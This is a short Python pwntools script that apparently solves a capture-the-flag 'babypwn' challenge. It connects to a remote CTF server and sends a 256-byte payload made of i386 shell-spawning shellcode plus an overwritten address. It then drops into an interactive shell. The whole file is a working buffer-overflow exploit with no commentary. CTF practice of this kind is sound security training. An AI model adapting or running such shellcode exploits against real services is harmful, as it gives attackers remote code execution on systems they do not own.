from pwn import remote, p32, process, shellcraft, asm

#p = process('./babypwn', env={"LD_PRELOAD": "./babylibc"})
p = remote('pwn-03.v7frkwrfyhsjtbpfcppnu.ctfz.one', 1234)
shellcode = asm(shellcraft.i386.linux.sh()) + 'y'
payload = shellcode.ljust(256, '\x00') + p32(0x80492e0)
p.sendlineafter('3. StrRemoveLastSymbols\r\n',  'X')
p.sendlineafter('(y or n)\r\n', payload)
p.interactive()